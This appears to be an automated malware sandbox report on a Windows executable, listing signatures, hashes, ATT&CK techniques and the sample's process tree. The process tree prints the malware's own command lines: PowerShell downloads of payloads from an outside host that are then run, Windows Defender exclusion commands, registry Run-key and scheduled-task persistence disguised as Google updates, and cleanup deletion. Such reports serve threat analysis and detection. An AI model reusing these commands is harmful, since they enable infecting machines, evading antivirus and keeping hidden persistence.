0670da9632a6639007d68c910a1bfdcca8ab9157324a65ce45bda3136f365a3c

Analysis

max time kernel
58s
max time network
82s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
21/09/2022, 06:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

303359be5a96f2404af7e635640b257d.exe
Size

138KB
MD5

303359be5a96f2404af7e635640b257d
SHA1

eed5a46a5605103022aee765c65b0edae9d33ebf
SHA256

0670da9632a6639007d68c910a1bfdcca8ab9157324a65ce45bda3136f365a3c
SHA512

526f035c53e3d5c6289f08dae106e8c955e83d1503a4bfd906e3f6997ee45f10cc942b55850e214036fbd560a568a3b4580eed4ad7d80977d2daa0e4681a00fc
SSDEEP

3072:rw7s+ebZ7usUCAco7ILE0+50u+kKVzdCf/z8:rn+ebTUCAco7IZLYCZI/

Score

8^/10

persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	reg.exe

Executes dropped EXE 5 IoCs

pid	Process
996	unzip.exe
908	unzip.exe
1856	unzip.exe
1992	unzip.exe
432	unzip.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateTask = "C:\\ProgramData\\Google\\software_reporter_tool.exe"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ip-api.com

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	unzip.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1668	1552	WerFault.exe	27

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1976	schtasks.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
548	reg.exe
1224	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1552	303359be5a96f2404af7e635640b257d.exe
1552	303359be5a96f2404af7e635640b257d.exe
1552	303359be5a96f2404af7e635640b257d.exe
1552	303359be5a96f2404af7e635640b257d.exe
1552	303359be5a96f2404af7e635640b257d.exe
1856	unzip.exe
908	unzip.exe
1992	unzip.exe
432	unzip.exe
996	unzip.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1552	303359be5a96f2404af7e635640b257d.exe
Token: SeDebugPrivilege	1856	unzip.exe
Token: SeDebugPrivilege	996	unzip.exe
Token: SeDebugPrivilege	1992	unzip.exe
Token: SeDebugPrivilege	432	unzip.exe
Token: SeDebugPrivilege	908	unzip.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 996 wrote to memory of 1828	996	unzip.exe	41
PID 996 wrote to memory of 1828	996	unzip.exe	41
PID 996 wrote to memory of 1828	996	unzip.exe	41
PID 996 wrote to memory of 1828	996	unzip.exe	41
PID 1856 wrote to memory of 696	1856	unzip.exe	40
PID 1856 wrote to memory of 696	1856	unzip.exe	40
PID 1856 wrote to memory of 696	1856	unzip.exe	40
PID 1856 wrote to memory of 696	1856	unzip.exe	40
PID 1828 wrote to memory of 1312	1828	cmd.exe	42
PID 1828 wrote to memory of 1312	1828	cmd.exe	42
PID 1828 wrote to memory of 1312	1828	cmd.exe	42
PID 1828 wrote to memory of 1312	1828	cmd.exe	42
PID 696 wrote to memory of 548	696	cmd.exe	43
PID 696 wrote to memory of 548	696	cmd.exe	43
PID 696 wrote to memory of 548	696	cmd.exe	43
PID 696 wrote to memory of 548	696	cmd.exe	43
PID 1856 wrote to memory of 1636	1856	unzip.exe	44
PID 1856 wrote to memory of 1636	1856	unzip.exe	44
PID 1856 wrote to memory of 1636	1856	unzip.exe	44
PID 1856 wrote to memory of 1636	1856	unzip.exe	44
PID 1636 wrote to memory of 1224	1636	cmd.exe	45
PID 1636 wrote to memory of 1224	1636	cmd.exe	45
PID 1636 wrote to memory of 1224	1636	cmd.exe	45
PID 1636 wrote to memory of 1224	1636	cmd.exe	45
PID 996 wrote to memory of 1924	996	unzip.exe	46
PID 996 wrote to memory of 1924	996	unzip.exe	46
PID 996 wrote to memory of 1924	996	unzip.exe	46
PID 996 wrote to memory of 1924	996	unzip.exe	46
PID 1924 wrote to memory of 952	1924	cmd.exe	47
PID 1924 wrote to memory of 952	1924	cmd.exe	47
PID 1924 wrote to memory of 952	1924	cmd.exe	47
PID 1924 wrote to memory of 952	1924	cmd.exe	47
PID 1552 wrote to memory of 1668	1552	303359be5a96f2404af7e635640b257d.exe	48
PID 1552 wrote to memory of 1668	1552	303359be5a96f2404af7e635640b257d.exe	48
PID 1552 wrote to memory of 1668	1552	303359be5a96f2404af7e635640b257d.exe	48
PID 432 wrote to memory of 1760	432	unzip.exe	49
PID 432 wrote to memory of 1760	432	unzip.exe	49
PID 432 wrote to memory of 1760	432	unzip.exe	49
PID 432 wrote to memory of 1760	432	unzip.exe	49
PID 1760 wrote to memory of 1976	1760	cmd.exe	50
PID 1760 wrote to memory of 1976	1760	cmd.exe	50
PID 1760 wrote to memory of 1976	1760	cmd.exe	50
PID 1760 wrote to memory of 1976	1760	cmd.exe	50
PID 432 wrote to memory of 276	432	unzip.exe	51
PID 432 wrote to memory of 276	432	unzip.exe	51
PID 432 wrote to memory of 276	432	unzip.exe	51
PID 432 wrote to memory of 276	432	unzip.exe	51

C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe
"C:\Users\Admin\AppData\Local\Temp\303359be5a96f2404af7e635640b257d.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1552 -s 1208
  2⤵
  - Program crash
  PID:1668

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1828
- - C:\Windows\SysWOW64\netsh.exe
    netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8
    3⤵
    PID:1312
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1924
- - C:\Windows\SysWOW64\netsh.exe
    netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=2
    3⤵
    PID:952

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" Add-MpPreference -ExclusionPath 'C:\Windows\Temp';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'InstallUtil.exe';Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe';Add-MpPreference -ExclusionProcess 'svchost.exe';Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE';Add-MpPreference -ExclusionPath 'C:\ProgramData\Google\GoogleUpdate.exe';Add-MpPreference -ExclusionProcess 'unzip.exe';Add-MpPreference -ExclusionProcess 'cmd.exe';Add-MpPreference -ExclusionProcess 'GoogleUpdate.exe'
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" cmd.exe /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe";cmd.exe /c reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "GoogleUpdateTask" /t REG_SZ /f /d "C:\ProgramData\Google\software_reporter_tool.exe"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:696
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:548
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v GoogleUpdateTask /t REG_SZ /f /d C:\ProgramData\Google\software_reporter_tool.exe
    3⤵
    - Adds policy Run key to start application
    - Modifies registry key
    PID:1224

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/obieznne.msi','C:\ProgramData\Google\software_reporter_tool.exe');C:\ProgramData\Google\software_reporter_tool.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\ProgramData\Google\unzip.exe
"C:\ProgramData\Google\unzip.exe" (New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/cmd.msi','C:\ProgramData\Google\GoogleUpdate.exe');(New-Object System.Net.WebClient).DownloadFile('http://cothdesigns2.com:443/xmlo2.msi','C:\Windows\Temp\.xml');cmd.exe /c schtasks /create /xml "C:\Windows\Temp\.xml" /tn "GoogleUpdateTask";cmd.exe /c del "C:\Windows\Temp\.xml"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1760
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask
    3⤵
    - Creates scheduled task(s)
    PID:1976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml
  2⤵
  PID:276

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Google\unzip.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\ProgramData\Google\unzip.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\ProgramData\Google\unzip.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\ProgramData\Google\unzip.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
C:\ProgramData\Google\unzip.exe

Filesize
442KB

MD5
92f44e405db16ac55d97e3bfe3b132fa

SHA1
04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

SHA256
6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

SHA512
f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

Download Submit
memory/432-90-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/432-66-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/432-84-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/908-82-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/908-69-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/996-81-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/996-57-0x0000000075241000-0x0000000075243000-memory.dmp

Filesize
8KB

Download
memory/996-65-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/1552-54-0x00000000002D0000-0x00000000002F8000-memory.dmp

Filesize
160KB

Download
memory/1856-68-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/1856-76-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/1992-67-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/1992-85-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download
memory/1992-86-0x0000000073620000-0x0000000073BCB000-memory.dmp

Filesize
5.7MB

Download